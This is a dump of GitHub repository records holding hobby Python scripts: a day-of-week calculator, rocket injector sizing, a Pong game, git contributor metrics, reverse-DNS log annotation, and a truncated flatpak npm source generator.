5f69adb628631a8b6037d1794bdec4402215bc81
b27b6cfffe8c16e22e29f333bf2b2ef337ad9c25
refs/heads/master
2021-05-21T20:38:42.000977
2020-05-10T23:56:59
2020-05-10T23:56:59
252,791,518
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6203798055648804, "alphanum_fraction": 0.657341480255127, "avg_line_length": 36.56687927246094, "blob_id": "a8dcd6f2f8cac409cfc8985bbab4afe1b65175c4", "content_id": "4788600405c471cad7b81371822feb48721e373b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5898, "license_type": "no_license", "max_line_length": 165, "num_lines": 157, "path": "/Main.py", "repo_name": "demmanuel2004/Create-Task", "src_encoding": "UTF-8", "text": "#Created By Daniel Emmanuel and Lukas Mikulenas \nimport calendar\n\ndef findday(date):\n day , month , year = (int(i) for i in date.split(' '))\n daynumber = calendar.weekday(day , month , year )\n days = ['Monday' , 'Tuesday' , 'Wednesday' , 'Thursay' , 'Friday' , 'Saturday' , 'Sunday']\n return (days[daynumber])\n\n date1 = ' 03 02 2019 '\n print(findday(date1))\n #from datetime import datetime, date\n#Created By Lukas Mikulenas\ndef day_year(user_year):\n if user_year <= 1699 and user_year >= 1600:\n global year_addition \n year_addition = 6 \n elif user_year <= 1799 and user_year >= 1700:\n year_addition = 4 \n elif user_year <= 1899 and user_year >= 1700:\n year_addition = 2\n elif user_year <= 1999 and user_year >= 1900:\n year_addition = 0\n elif user_year <= 2000 and user_year >= 2099:\n year_addition = 6 \n\ndef day_month(user_month):\n if user_month == 1 or user_month == 10:\n global month_addition\n month_addition = 0 \n elif user_month == 2 or user_month == 3:\n month_addition = 3 \n elif user_month == 4 or user_month == 7:\n month_addition = 6\n elif user_month == 5:\n month_addition = 1\n elif user_month == 6:\n month_addition = 4\n elif user_month == 7:\n month_addition = 6\n elif user_month == 8:\n month_addition = 2\n elif user_month == 9 or user_month == 12:\n month_addition = 5\n elif user_month == 11:\n month_addition = 3\n\nname = input(\"Welcome user, what is your name? \\n\"); \nuser_year = int(input(\"Welcome \" + name +\" \\n\" \"Enter the year between the years 1600 and 2099. Please format it in numbers only <1999, etc>: \\n\")); \nwhile user_year > 3000 or user_year < 1599:\n user_year = int(input(\"Invalid Year! Please enter a year that is between 1600 and 2099. \\n\"))\nuser_month = int(input(\"Now \" + name + \", Enter the number of the month your day is located in. Please format it in numbers only <for example, June will be 6>: \\n\"))\n\ndef leap_year_addition(user_year):\n if user_year % 4 == 0:\n global subtract_year\n subtract_year = 1 \n elif user_year % 4 != 0:\n subtract_year = 0 \n\nwhile user_month > 13 or user_year < 0:\n user_month = int(input(\"Invalid Month! Please enter a month that is between 1 and 12. \\n\"))\nuser_day = int(input(\"Finally \" + name + \", Enter the number day of the month in numbers please <1, 3, etc>: \\n\"))\n\nwhile user_day > 31 or user_year < 0:\n user_day = int(input(\"Invalid Day! Please enter a day that is between 31 and 1. \\n\"))\nday_month(user_month)\n\ndef main_calculation(user_year, user_month, user_day, month_addition):\n day_year(user_year)\n leap_year_addition(user_year)\n if user_year <= 1699 and user_year >= 1600:\n century_addition = 6 \n elif user_year <= 1799 and user_year >= 1700:\n century_addition = 4 \n elif user_year <= 1899 and user_year >= 1800:\n century_addition = 2\n elif user_year <= 1999 and user_year >= 1900:\n century_addition = 0\n elif user_year <= 2099 and user_year >= 2000:\n century_addition = 6 \n last_user_year = int(str(user_year)[2:4])\n\n if subtract_year == 1 and user_month != 2:\n counter_subtract = 1\n elif subtract_year == 0:\n counter_subtract = 0\n elif subtract_year == 1 and user_month == 2:\n counter_subtract = 0 \n day_calculated = user_day + month_addition + century_addition + last_user_year - subtract_year + counter_subtract + last_user_year / 4 \n global day_number_calculated\n day_number_calculated = day_calculated % 7\n global fixed_last_user_year \n fixed_last_user_year = day_number_calculated\n fixed_last_user_year = float(str(fixed_last_user_year)[0:2])\n if fixed_last_user_year == 0:\n print (\"It will be Sunday!\")\n elif fixed_last_user_year == 1:\n print (\"It Will be Monday!\")\n elif fixed_last_user_year == 2:\n print (\"It Will be Tuesday!\")\n elif fixed_last_user_year == 3:\n print (\"It Will be Wedensday!\")\n elif fixed_last_user_year == 4:\n print (\"It Will be Thursday!\")\n elif fixed_last_user_year == 5:\n print (\"It Will be Friday!\")\n elif fixed_last_user_year == 6:\n print (\"It Will be Saturday!\")\nmain_calculation(user_year, user_month, user_day, month_addition)\n\n#Created by Daniel Emmanuel\nfrom datetime import datetime, date\n# to calculate no of days between two given dates \n\ndef no_of_days(start,end):\n if start > end :\n diff = start - end \n else:\n diff = end - start \n print(\"You have %d days of time left\" % diff.days)\n#Print no of days between two different dates entered by user , stored in diff \n\n#Asking the user to whether to count no of days or not \nanswer = input(\"Continue? Enter yes to find the number of days between two dates: \")\nif answer == \"yes\":\n print(\"\\n Welcome back \" + name +\". Calculate number of days between two given dates <year>-<month>-<date> :\\n\")\n fdate = input(\"Enter the Start date :- \")\n start = datetime.strptime(fdate, \"%Y-%m-%d\")\n # %m will check month no should be from 1-12\n # %d will check that date should be from 1-31\n ldate = input(\"Enter the last date :- \")\n end = datetime.strptime(ldate, \"%Y-%m-%d\")\n no_of_days(start , end)\n print(\"\\n Thank you \" + name +\" for using this program\")\nelse:\n print(\"\\n Thank you \" + name +\" for using this program\")\n\n\n''' Algorithm :\nStep 1 : Input name of user.\nStep 2 : Call day of week \nStep 3 : Input answer(yes/no)\nStep 4 : If answer is yes , then goto step 6.\nStep 5 : If answer is no , them goto step 10\nStep 6 : Print name of user .\nStep 7 : Input start date in format defined in strptime , predefined function in datetime module .\nStep 8 : Input end date in format defined in strptime , predefined function in datetime module \nStep 9 : Call no_of_days(start , end)\nStep 10 : Exit.\nAlgorithm to calculate no of days between two dates\nno_of_days(start , end)\nStep 1 : If start > end , then\n\tdiff = start - end\nStep 2 : If start <= end , then\n\tdiff = end - start \nStep 3 : Print no of days between two different dates entered by user , stored in diff '''\n" } ]
1
caiorsf/turbo-bassoon
https://github.com/caiorsf/turbo-bassoon
3a7e6d0fbd8e5443217a914e791cc0cd94f97fb9
00e022cdb6a3a05b5ccc4c43a267896a83731269
7a4d124bfea6e2faeb6f9f039a8372ede87935a3
refs/heads/master
2020-08-26T21:21:26.079747
2019-10-23T20:59:41
2019-10-23T20:59:41
217,152,235
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5070129632949829, "alphanum_fraction": 0.5610389709472656, "avg_line_length": 28.015625, "blob_id": "05026c8c63a14b133391e77add0b144197951109", "content_id": "885ec926e7200e4a1296587873ec9c46dfff041e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1937, "license_type": "no_license", "max_line_length": 125, "num_lines": 64, "path": "/Swirl Injector Combustivel.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom scipy.optimize import fsolve, minimize\r\nimport math\r\ndef truncate(number, digits) -> float:\r\n stepper = 10.0 ** digits\r\n return math.trunc(stepper * number) / stepper\r\n\r\n#FUEL\r\n\r\n#VARIABLES\r\nr_kc0=4.5e-3\r\nr_ksc=r_kc0\r\nr_bxc0=0.3e-3\r\n\r\n#CONSTANTS\r\n##Condições de projeto\r\n###Parâmetros do liquido\r\ndelta_p=7.1e5 #Queda de pressão\r\nrho_c=800 #Densidade \r\nu_kc=2e-6 #Viscosidade cinemática\r\nmass_rc_target=0.0722 #Vazão mássica requerida\r\n###Parâmetros geométricos\r\nXi_yc=1.1 #Razão entre o raio de entrada do canal tangencial e seu diâmetro\r\nl_bxc=6*r_bxc0 #Comprimento do canal tangencial\r\nn_c=6 #Número de canais tangenciais\r\n\r\nK_c=1\r\n\r\ndef func(u):\r\n r_kc=u[0]\r\n r_bxc=u[1]\r\n R_bxc=r_kc-r_bxc\r\n A_c=R_bxc*r_ksc / (n_c*r_bxc**2)\r\n c=2**0.5*r_ksc*(r_kc-r_bxc)\r\n f=c/(2*n_c*r_bxc**2)\r\n phi_c=float(fsolve(lambda x: f*x**1.5+x-1, 1.0))\r\n print('phi_c:'+str(phi_c))\r\n mu_c=phi_c*(phi_c/(2-phi_c))**0.5\r\n print('mu_c:'+str(mu_c))\r\n #r_asc=((1-phi_c)*r_ksc)**0.5\r\n f_ksc=np.pi*r_ksc**2\r\n mass_ic=mu_c*f_ksc*(2*rho_c*delta_p)**0.5\r\n W_c=mass_ic/(n_c*np.pi*r_bxc**2*rho_c)\r\n Re_c=W_c*2*r_bxc*u_kc**-1\r\n lambda_c=0.3164*Re_c**(-0.25)\r\n Xi_c=Xi_yc+lambda_c*(l_bxc/(2*r_bxc))\r\n C_c=R_bxc/r_ksc\r\n f=np.pi*r_kc**2*(2*rho_c*delta_p)**0.5\r\n g=(phi_c**-2 + (A_c**2*K_c**2) / (1-phi_c) +Xi_c*n_c*(A_c/C_c)**2)**0.5\r\n mass_rc=f/g \r\n print(\"mass_rc = {}, u = {}\".format(mass_rc, u))\r\n delta_mass = mass_rc - mass_rc_target\r\n return delta_mass**2\r\n\r\n\r\nu0 = np.array([r_kc0,r_bxc0])\r\n\r\nbnds=[(1e-3,10e-3),(0.5e-3,2.5e-3)]\r\n\r\nresult = minimize(func, u0, bounds=bnds, method=\"SLSQP\", tol=1e-8)\r\n\r\nresult_new=[i for i in result.x]\r\n\r\nprint('r_kc={:.1E},r_ksc={:.1E},r_bxc={:.1E},l_bxc={:.1E}'.format(result_new[0],result_new[0],result_new[1],result_new[1]*6))\r\n\r\n\r\n" }, { "alpha_fraction": 0.3604166805744171, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 19.909090042114258, "blob_id": "236aeb20e8a008803f6915660cbb12ae5bfed3ce", "content_id": "b1e1d437064c1391b363ec696c4032630bde90fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/Comprimento de injeção.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": "UTF-8", "text": "#Oxidante\r\nmass_ro = 0.1729343632791287\r\nmu_io=0.5141532076547852\r\nphi_omega_o=0.7020209970839623\r\ndelta_po=4.4e5\r\nrho_o =1140\r\n#Combustível\r\nmass_rc = 0.0721982629534907\r\nphi_c=0.1339960640658725\r\nmu_c=0.035907220197069774\r\ndelta_pc=7.1e5\r\nrho_c=800\r\n\r\nkm=mass_ro/mass_rc\r\ntau=0.11e-3\r\n\r\na=( km*mu_c / ( (km+1)*phi_c ) ) * (delta_pc/rho_c)**0.5\r\nb=( mu_io / ( ( km+1 )*phi_omega_o ) ) * (delta_po/rho_o)**0.5\r\n\r\nl_inj=(2**0.5)*tau*(a+b)\r\n\r\nprint('l_inj(m)={:.2E}'.format(l_inj))" }, { "alpha_fraction": 0.496056467294693, "alphanum_fraction": 0.5516812205314636, "avg_line_length": 27.740739822387695, "blob_id": "c3c20c99f784c82261b0ea9a0b508128770a1941", "content_id": "6ddd389dfd4f9ff44d5625c0ea75ddf6fd6e0915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2422, "license_type": "no_license", "max_line_length": 125, "num_lines": 81, "path": "/Swirl Injector Oxidante.py", "repo_name": "caiorsf/turbo-bassoon", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom scipy.optimize import fsolve, minimize,LinearConstraint\r\nimport math\r\ndef truncate(number, digits) -> float:\r\n stepper = 10.0 ** digits\r\n return math.trunc(stepper * number) / stepper\r\n\r\n#OXIDIZER\r\n\r\n#VARIABLES\r\nr_kso0=1e-3 \r\nr_bxo0=0.3e-3 \r\nr_ko0=2e-3 \r\n\r\n#CONSTANTS\r\n##Condições de projeto\r\n###Parâmetros do liquido\r\ndelta_p = 4.4e5 #Queda de pressão \r\nrho_o = 1140 #Densidade\r\nmu_o = 7.64e-6 #Viscosidade dinâmica\r\nuk_o = 1.94e-6 #Viscosidade cinemática\r\nmass_ro_target=0.1729 #Vazão mássica requerida\r\n###Parâmetros geométricos\r\nXi_yo=0.3 #Razão entre o raio de entrada do canal tangencial e seu diâmetro\r\nl_bxo=6*r_bxo0 #Comprimento do canal tangencial\r\nn_o=6 #Número de canais tangenciais\r\n\r\nbnds=[(1e-3,10e-3),(0.5e-3,2.5e-3),(1e-3,10e-3)]\r\n\r\ndef func(u):\r\n r_kso = u[0]\r\n r_bxo = u[1]\r\n r_ko = u[2]\r\n \r\n # phi_i_o\r\n c=2**0.5*r_kso*(r_ko-r_bxo)\r\n f=c/(2*n_o*r_bxo**2)\r\n\r\n phi_i_o=float(fsolve(lambda x: f*x**1.5+x-1, 1.0))\r\n\r\n # lambda_o\r\n mu_io=phi_i_o*(phi_i_o/(2-phi_i_o))**0.5\r\n print('mu_io='+str(mu_io))\r\n f_kso=np.pi*r_kso**2\r\n mass_io=mu_io*f_kso*(2*rho_o*delta_p)**0.5\r\n W_o=mass_io / ( n_o * np.pi * r_bxo**2 * rho_o )\r\n Re_o=W_o*2*r_bxo*uk_o**-1\r\n lambda_o=0.3164*Re_o**(-0.25)\r\n\r\n # A_io\r\n A_io=r_kso*(r_ko-r_bxo) / (n_o*r_bxo**2)\r\n\r\n # phi_omega_o\r\n d=2*( ( (r_ko-r_bxo)*(r_ko-r_kso-r_bxo)*lambda_o / 2 ) +n_o*r_bxo**2 )\r\n e=c/d\r\n\r\n phi_omega_o=float(fsolve(lambda x: e*x**1.5+x-1,1.0))\r\n print('phi_omega_o='+str(phi_omega_o))\r\n\r\n # A_omega_o\r\n A_omega_o=((1-phi_omega_o)*2**0.5) / (phi_omega_o**1.5)\r\n\r\n # mass_ro\r\n K_0=A_io/A_omega_o\r\n C_o=r_ko-r_bxo/ r_kso\r\n f=np.pi*r_kso**2*(2*rho_o*delta_p)**0.5\r\n g=(phi_omega_o**-2 + (A_io**2*K_0**2) / (1-phi_omega_o) +Xi_yo*n_o*(A_io/C_o)**2)**0.5\r\n mass_ro=f/g \r\n print(\"mass_ro = {}, u = {}\".format(mass_ro, u))\r\n delta_mass = mass_ro - mass_ro_target\r\n return delta_mass**2\r\n\r\nu0 = np.array([r_kso0, r_bxo0, r_ko0])\r\n\r\ncon=LinearConstraint([-1,0,1],[0],[np.inf])\r\n\r\nresult = minimize(func, u0, bounds=bnds, method=\"SLSQP\", tol=1e-8,constraints=con)\r\n\r\nresult_new=[i for i in result.x]\r\n\r\nprint('r_kso={:.1E},r_bxo={:.1E},r_ko={:.1E},l_bxo={:.1E}'.format(result_new[0],result_new[1],result_new[2],6*result_new[1]))\r\n" } ]
3
joseph-zhong/srpub
https://github.com/joseph-zhong/srpub
d961effc998de58ea7447c165b067d88faa4fb4c
795d8dbc976e4835913f2131f05b99539e391a37
119cb20a3aefed494b4956f3dcc39f4700f22f91
refs/heads/master
2020-05-31T20:04:47.978617
2019-05-13T19:07:10
2019-05-13T19:07:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48794063925743103, "alphanum_fraction": 0.5046381950378418, "avg_line_length": 14.852941513061523, "blob_id": "c36dacc885c65a356de84f2a6eaf8b52c538d2f0", "content_id": "4c978a2e88277fbedbcd48e88dbf8359fbeb962c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 44, "num_lines": 34, "path": "/examples/python/excel.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nclass Cell:\n def __init__(self, val):\n self.raw = val\n\n def __str__(self):\n if not self.raw:\n return \"\"\n return str(self.raw)\n\n\nclass Sheet:\n def __init__(self):\n self.cells = {}\n\n def set(self, cell, val):\n self.cells[cell] = Cell(val)\n\n def read(self, cell):\n c = self.cells.get(cell, Cell(None))\n return str(c)\n\n\n\ns = Sheet()\n\ns.set(\"A2\", \"5\")\nprint \"A2\", s.read(\"A2\")\n\ns.set(\"A3\", \"hello\")\nprint \"A3\", s.read(\"A3\")\n\nprint \"B5\", s.read(\"B5\")\n" }, { "alpha_fraction": 0.5476878881454468, "alphanum_fraction": 0.5621387362480164, "avg_line_length": 22.066667556762695, "blob_id": "9dc445eb7022cf568fcd62939a9f6a53315b857c", "content_id": "a9b21149c64ef7883008d61cd2afbf879b342bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 692, "license_type": "no_license", "max_line_length": 67, "num_lines": 30, "path": "/nslookup_regex.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport re, sys, socket\n\nimport colorstrings\n\nnscache = dict()\ndef ns_lookup(ip):\n global nscache\n if ip in nscache:\n return nscache[ip]\n try:\n fullhost = socket.gethostbyaddr(ip)[0]\n except:\n nscache[ip] = None\n return None\n if 'prod.uber.internal' in fullhost:\n res = fullhost.split('.')[0]\n else:\n res = fullhost\n nscache[ip] = res\n return res\n\nfor line in sys.stdin:\n for ip in re.findall(r'\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}', line):\n box = ns_lookup(ip)\n if box:\n #print ip + ' is ' + box\n line = line.replace(ip, colorstrings.blue_str(box))\n print line.rstrip()\n" }, { "alpha_fraction": 0.5202217102050781, "alphanum_fraction": 0.5440361499786377, "avg_line_length": 26.676136016845703, "blob_id": "f488b0d5644676646f0bf8b11539ebf1d3082e8b", "content_id": "56433d2b1d4a3a9eb8b19035d089f4c4c7af4d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4871, "license_type": "no_license", "max_line_length": 96, "num_lines": 176, "path": "/git_metrics.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom __future__ import print_function\n\nfrom srutils import *\nimport sys, re\nimport operator\nfrom collections import namedtuple\n\n# A map of known aliases -> name\nkauths = {}\n\n# A map of kname to longest-name\nlongname = {}\n\nclass TimeRange:\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\nall_cnt = {}\nall_tim = TimeRange(9999999999, 0)\nsme_cnt = {}\nsme_tim = TimeRange(9999999999, 0)\nl100_cnt = {}\nl100_tim = TimeRange(9999999999, 0)\n\noverall = False\nMY_NAME = \"sam russell\"\nif len(sys.argv) > 1:\n if sys.argv[1] == \"overall\":\n overall = True\n MY_NAME = \"zzzzzzzzzzz\"\n else:\n MY_NAME = sys.argv[1]\nSTRIP_PREFX = \"ctrl\"\n\ndef looks_similar(a, b):\n a = a.lower().strip()\n b = b.lower().strip()\n if a == b:\n return True\n words_a = a.split(\" \")\n words_b = b.split(\" \")\n if len(words_a) != len(words_b):\n return False\n for idx in range(len(words_a)):\n if words_a[idx] in words_b[idx] or words_b[idx] in words_a[idx]:\n continue\n return False\n return True\n\ndef put_in_known(name, email):\n global kauths\n name = name\n email = email\n\n # if we have both the name and email, we're done\n if name in kauths and email in kauths:\n #if kauths[name] == kauths[email]:\n # return\n return\n\n if name in kauths:\n # we have the name, but not the email\n kauths[email] = kauths[name]\n return\n\n if email in kauths:\n # we have the email, but not the name\n kauths[name] = kauths[email]\n return\n\n # we have neither the exact email nor exact name\n found = False\n for other_auth in kauths.keys():\n if looks_similar(name, other_auth):\n kauths[name] = kauths[other_auth]\n kauths[email] = kauths[other_auth]\n return\n\n # we did not find any similar name matches\n # so add a new entry\n fname = name\n if name.startswith(STRIP_PREFX):\n fname = name[len(STRIP_PREFX):]\n kauths[name] = fname\n kauths[email] = fname\n\ndef get_aliases(name, emails=True):\n global kauths\n res = {}\n for k, v in kauths.items():\n if v == name:\n if \"@\" in k or not emails:\n res[k] = True\n return res.keys()\n\ndef print_cnt_dict(title, cnts, tim, limit=10):\n sorted_x = sorted(cnts.items(), key=operator.itemgetter(1), reverse=True)\n did_me = False\n total_time = (tim.end - tim.start)\n print(\"\\n\\n=== {} === \\t ({})\".format(title, dur_to_human(total_time)))\n print(\"%3s\" % \"\" + \" \" + \"%5s\" % \"cnt \" + \" \" + \"/week\" + \" \" + \"name\")\n print(\"%3s\" % \"\" + \" \" + \"%5s\" % \"--- \" + \" \" + \"-----\" + \" \" + \"----\")\n for i, x in enumerate(sorted_x):\n kname = x[0]\n is_me = looks_similar(kname, MY_NAME)\n name = longname[kname].title()\n if is_me:\n did_me = True\n name = blue_str(name)\n cnt = x[1]\n rate = (float(cnt) / (total_time / 604800))\n if i == limit:\n if did_me:\n break\n else:\n print(\" ...\")\n if i >= limit and not is_me:\n continue\n print(\"%3d\" % (i+1) + \". \" + \"%5d \" % cnt + \" %.1f \" % rate + \" {0: <20}\".format(name))\n\ngit_log_raw = cmd(\"git log master --format='%H,%aN,%ae,%at'\")\n\nseen_me = False\ncommits = git_log_raw.split('\\n')\nfor i, c in enumerate(reversed(commits)):\n cs = c.strip().split(',')\n if len(cs) != 4:\n continue\n sha = cs[0].strip()\n name = cs[1].strip().lower()\n email = cs[2].strip().lower()\n dt = int(cs[3].strip())\n\n is_mine = looks_similar(name, MY_NAME)\n if is_mine:\n seen_me = True\n\n put_in_known(name, email)\n kname = kauths[name]\n\n # set the longest-name which kname maps to\n if kname not in longname:\n longname[kname] = kname\n if len(name) >len( longname[kname]):\n longname[kname] = name\n\n all_cnt[kname] = all_cnt.get(kname, 0) + 1\n all_tim.start = min(all_tim.start, dt)\n all_tim.end = max(all_tim.end, dt)\n if seen_me:\n sme_cnt[kname] = sme_cnt.get(kname, 0) + 1\n sme_tim.start = min(sme_tim.start, dt)\n sme_tim.end = max(sme_tim.end, dt)\n if i > len(commits) - 100:\n l100_cnt[kname] = l100_cnt.get(kname, 0) + 1\n l100_tim.start = min(l100_tim.start, dt)\n l100_tim.end = max(l100_tim.end, dt)\n\n#print(\"\\n\\n== kauth map ==\")\n#for k,v in kauths.items():\n# print(\"%50s\" % k, \" \", \"%50s\" % v)\n\n#print(\"\\n\\n== kauth map ==\")\n#for k,v in all_cnt.items():\n# print(\"%50s\" % k, \" \", \"%50s\" % v)\n\nif overall:\n print_cnt_dict(\"Overall\", all_cnt, all_tim, limit=100)\nelse:\n # print personalized\n print_cnt_dict(\"Overall\", all_cnt, all_tim)\n print_cnt_dict(\"Since-First\", sme_cnt, sme_tim)\n print_cnt_dict(\"Last 100\", l100_cnt, l100_tim)\n" } ]
3
sqrtxander/pong
https://github.com/sqrtxander/pong
37aaa9b621c7aaf8b0310179db419be11effcfcb
b06cc3657debda33338f61001d0f8a00e49c41ff
501d389c62dc239a05b7beb71ceada4480991790
refs/heads/main
2023-07-14T16:02:28.137545
2021-08-29T02:31:02
2021-08-29T02:31:02
400,449,197
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5487679839134216, "alphanum_fraction": 0.5739219784736633, "avg_line_length": 30.67479705810547, "blob_id": "c51e7b8b677d016fb67d148836491926165d790b", "content_id": "99b0cb33e236a5e5e2cd3bdca1a8d8ed95b2370e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3896, "license_type": "no_license", "max_line_length": 116, "num_lines": 123, "path": "/main.py", "repo_name": "sqrtxander/pong", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nimport random\n\n# GLOBALS\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nPXSIZE = 4\nWIDTH, HEIGHT = 320 * PXSIZE, 240 * PXSIZE\n\n# INITIALISE PYGAME\npygame.init()\npygame.display.set_caption('Pong!')\npygame.display.set_icon(pygame.image.load('media/icon.png'))\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n# font = pygame.font.SysFont('Jetbrains Mono', 30)\nrandom.seed()\n\n\nclass Ball:\n def __init__(self):\n self.img = pygame.image.load('media/ball.png')\n self.img = pygame.transform.scale(self.img, (self.img.get_width() * PXSIZE, self.img.get_height() * PXSIZE))\n self.rect = self.img.get_rect()\n self.dir = math.radians(random.uniform(165, 196))\n # self.dir = math.radians(170)\n self.speed = 8*PXSIZE\n self.rect.center = ((WIDTH - self.rect.width)//2, (HEIGHT - self.rect.height)//2)\n self.truepos = [self.rect.x, self.rect.y]\n\n def reset_ball(self):\n\n if random.randint(0, 1):\n self.dir = math.radians(random.uniform(150, 170))\n else:\n self.dir = math.radians(random.uniform(180, 220))\n\n print(math.degrees(self.dir))\n self.rect.center = ((WIDTH - self.rect.width)//2, (HEIGHT - self.rect.height)//2)\n self.truepos = [self.rect.x, self.rect.y]\n\n def update(self, p1, p2):\n win.blit(self.img, self.rect)\n\n dx = self.speed * math.cos(self.dir)\n dy = self.speed * math.sin(self.dir)\n\n steps = int(abs(dx) + abs(dy))\n for _ in range(0, steps, PXSIZE):\n self.truepos[0] += self.speed * math.cos(self.dir)/steps\n self.truepos[1] -= self.speed * math.sin(self.dir)/steps\n self.rect.topleft = self.truepos[0], self.truepos[1]\n self.bounce(p1, p2)\n\n if self.rect.right < 0 or self.rect.left > WIDTH:\n self.reset_ball()\n\n def bounce(self, p1, p2):\n # top and bottom\n if self.rect.y < 0 or self.rect.y > HEIGHT - self.rect.height:\n self.dir *= -1\n\n # paddles\n if pygame.Rect.colliderect(self.rect, p1.rect) or pygame.Rect.colliderect(self.rect, p2.rect):\n self.dir = math.radians(180) - self.dir\n\n # if pygame.Rect.colliderect(self.rect, p1.rect):\n # dy = self.rect.centery - p1.rect.centery\n # dx = p1.rect.centerx - self.rect.centerx\n # self.dir = math.atan2(dy, dx)\n # self.dir += math.radians(180)\n #\n # if pygame.Rect.colliderect(self.rect, p2.rect):\n # dy = self.rect.centery - p2.rect.centery\n # dx = p2.rect.centerx - self.rect.centerx\n # self.dir = math.atan2(dy, dx)\n # self.dir += math.radians(180)\n\n\nclass Paddle:\n def __init__(self, x):\n self.img = pygame.image.load('media/paddle.png')\n self.img = pygame.transform.scale(self.img, (self.img.get_width() * PXSIZE, self.img.get_height() * PXSIZE))\n self.rect = self.img.get_rect()\n self.speed = 4*PXSIZE\n self.rect.center = (x, HEIGHT//2)\n\n def update(self, dy):\n win.blit(self.img, self.rect)\n\n dy = self.speed*dy\n steps = abs(dy)\n for _ in range(0, steps, PXSIZE):\n if 0 < self.rect.y - dy/steps < HEIGHT - self.rect.height:\n self.rect.y -= dy/steps\n\n\ndef main():\n pl_1 = Paddle(32 * PXSIZE)\n pl_2 = Paddle(WIDTH-32 * PXSIZE)\n ball = Ball()\n run = True\n\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n pressed = pygame.key.get_pressed()\n\n win.fill(BLACK)\n pl_1.update(pressed[pygame.K_w]-pressed[pygame.K_s])\n pl_2.update(pressed[pygame.K_UP]-pressed[pygame.K_DOWN])\n ball.update(pl_1, pl_2)\n\n pygame.display.update()\n\n clock.tick(30)\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
adityashah1212/flatpak-builder-tools
https://github.com/adityashah1212/flatpak-builder-tools
0e4ec8bcef9dcdab3a12008e35fdcd143d538a5f
21875364f78fc6076e4e98739fa143b2b38ff9a2
1edcfb146103fee099015f5bd55d7e6de403b832
refs/heads/master
2021-09-03T02:49:56.399443
2017-12-21T10:07:28
2017-12-21T10:07:28
115,273,163
0
0
null
2017-12-24T15:53:17
2017-12-21T10:08:16
2017-12-21T10:08:15
null
[ { "alpha_fraction": 0.5492262840270996, "alphanum_fraction": 0.5597667694091797, "avg_line_length": 34.672000885009766, "blob_id": "e8a576e1a10e4be3914dae41395bf51832c22fee", "content_id": "223a1581839ba7bc7a4fe28726da73838b08f14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4459, "license_type": "no_license", "max_line_length": 128, "num_lines": 125, "path": "/npm/flatpak-npm-generator.py", "repo_name": "adityashah1212/flatpak-builder-tools", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport json\nimport base64\nimport binascii\nimport urllib.request\nimport urllib.parse\n\nelectron_arches = {\n \"ia32\": \"i386\",\n \"x64\": \"x86_64\",\n \"arm\": \"arm\"\n}\n\n\ndef getModuleSources(module, seen=None, include_devel=True):\n sources = []\n seen = seen or {}\n\n version = module.get(\"version\", \"\")\n added_url = None\n\n if module.get(\"dev\", False) and not include_devel:\n pass\n if module.get(\"bundled\", False):\n pass\n elif module.get(\"resolved\", False) or (version.startswith(\"http\") and not version.endswith(\".git\")):\n if module.get(\"resolved\", False):\n url = module[\"resolved\"]\n else:\n url = module[\"version\"]\n added_url = url\n integrity = module[\"integrity\"]\n if integrity not in seen:\n seen[integrity] = True\n integrity_type, integrity_base64 = integrity.split(\"-\", 2)\n hex = binascii.hexlify(base64.b64decode(integrity_base64)).decode('utf8')\n source = {\"type\": \"file\",\n \"url\": url,\n \"dest\": \"npm-cache/_cacache/content-v2/%s/%s/%s\" % (integrity_type, hex[0:2], hex[2:4]),\n \"dest-filename\": hex[4:]}\n source[integrity_type] = hex\n sources.append(source)\n\n if added_url:\n # Special case electron, adding sources for the electron binaries\n tarname = added_url[added_url.rfind(\"/\")+1:]\n if tarname.startswith(\"electron-\") and tarname[len(\"electron-\")].isdigit() and tarname.endswith(\".tgz\"):\n electron_version = tarname[len(\"electron-\"):-len(\".tgz\")]\n\n shasums_url = \"https://github.com/electron/electron/releases/download/v\" + electron_version + \"/SHASUMS256.txt\"\n f = urllib.request.urlopen(shasums_url)\n shasums = {}\n shasums_data = f.read().decode(\"utf8\")\n for line in shasums_data.split('\\n'):\n l = line.split()\n if len(l) == 2:\n shasums[l[1][1:]] = l[0]\n\n mini_shasums = \"\"\n for arch in electron_arches.keys():\n basename = \"electron-v\" + electron_version + \"-linux-\" + arch + \".zip\"\n source = {\"type\": \"file\",\n \"only-arches\": [electron_arches[arch]],\n \"url\": \"https://github.com/electron/electron/releases/download/v\" + electron_version + \"/\" + basename,\n \"sha256\": shasums[basename],\n \"dest\": 